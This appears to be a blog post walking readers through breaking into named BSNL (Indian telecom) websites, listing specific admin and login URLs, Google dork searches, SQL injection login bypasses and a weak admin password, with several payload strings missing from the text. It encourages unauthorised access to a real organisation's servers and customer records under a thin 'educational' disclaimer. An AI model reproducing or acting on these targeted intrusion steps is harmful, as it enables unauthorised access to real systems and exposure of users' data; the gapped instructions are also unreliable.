Hack Bsnl websites easily
Disclaimer : The information provided below is for educational purpose only. The author is not responsible for any misuse of the information and discourages any illegal use of it.
Yes , we shall hack bsnl website easily , easy enough for a nursery kid. We shall be using Google Hacking and SQL Injection techniques.
So Lets begin.
Search this in google :
In the search results page go to second page. You would see plenty of links of the type :
Open that link and you will see lots of source code files.
Many of the links on this page show good information like :
Payment information - http://www.billchn.bsnl.co.in/admin/consol.jsp
Transaction information - http://www.billchn.bsnl.co.in/admin/consolidatedreport.jsp
Registered user page - http://www.billchn.bsnl.co.in/admin/registereduser.jsp
Even an administration page is available without login :
http://billchn.bsnl.co.in/modifypassword.jsp
and here :
http://www.billchn.bsnl.co.in/selectmodifyoption.jsp
Check out what can be hacked from there.
So you hacked into bsnl servers and found some information that should be password protected. If you are a creative hacker then try getting into the system with a proper login.
This is the login page :
http://www.billchn.bsnl.co.in/adminlogin.html
Another google hack term :
Search the above and you might get some more interesting links like :
http://www.str.bsnl.co.in:8009/y_circulars_list_v.asp?showmaster=1&categary=Admin
http://training.bsnl.co.in/MAIN_MODULE/telephone_directory.asp?selected_c_institute_cd=&selected_faculty=admin
http://training.bsnl.co.in/MAIN_MODULE/telephone_directory.asp?selected_c_institute_cd=TINST_17&selected_faculty=DE+ADMIN
http://training.bsnl.co.in/MAIN_MODULE/telephone_directory.asp?selected_c_institute_cd=&selected_faculty=DE+ADMIN
http://training.bsnl.co.in/MAIN_MODULE/telephone_directory.asp?selected_c_institute_cd=TINST_5&selected_faculty=admin
The above links appear to be : should have been password protected but they are publicly visible.
Want to hack more ?
Search for this :
and you will find urls like :
http://mpintranet.bsnl.co.in/wireless/login.asp
http://mpintranet.bsnl.co.in/fbooking/login.asp
all the above urls are vulnerable to sql injection. Enter the following as both username and password :
The whole thing above is the to be entered. The "or" does not mean that you enter one of them.
and you should be logged in. Happy Hacking!!
Try this url :
http://udaan.bsnl.co.in/
with username/password as :
Here is a screenshot :
On the same url udaan.bsnl.co.in , check the link called "View My Complain Status".
The url is http://udaan.bsnl.co.in/complaint/view_complaint_status.php
Enter the following in the Contact No field
and hit enter. And rightaway it will display all the entries in the database. Excellent hack, isnt it.
Want to hack more ? Still not satisfied ? OK
Open this url :
http://www.vas.bsnl.co.in/stm/index.jsp
and login with
as username and password , and you would be logged in as admin. Here is a screenshot :
Funny isn't it ?
Want another website ? Sure :
http://www.civil.bsnl.co.in:8080/civilbsnl/login.jsp
Login with :
as the username and abcd as the password. You should get logged in and the Administration Panel should be available.
Here is a screenshot :
Well done once again Bsnl !!
Note
Whatever shown above is nothing but a result of poor and insecure application development being done at Bsnl. Websites are vulnerable to various kinds of exploits like sql injection, information leak due to improper authentication check etc. Surely Bsnl needs to fix them up.
References :
1. SQL Injection Tutorial : http://en.wikipedia.org/wiki/SQL_injection
Disclaimer : The information provided below is for educational purpose only. The author is not responsible for any misuse of the information and discourages any illegal use of it.
Related Posts
About the Author: Silver Moon
Php developer, blogger and Linux enthusiast.
He can be reached at m00n.silv3r[at]gmail[dot]com
Click here to know more.
-
Pradyumna
-
mastermansachin
-
http://www.villboy.com Souvik Pratiher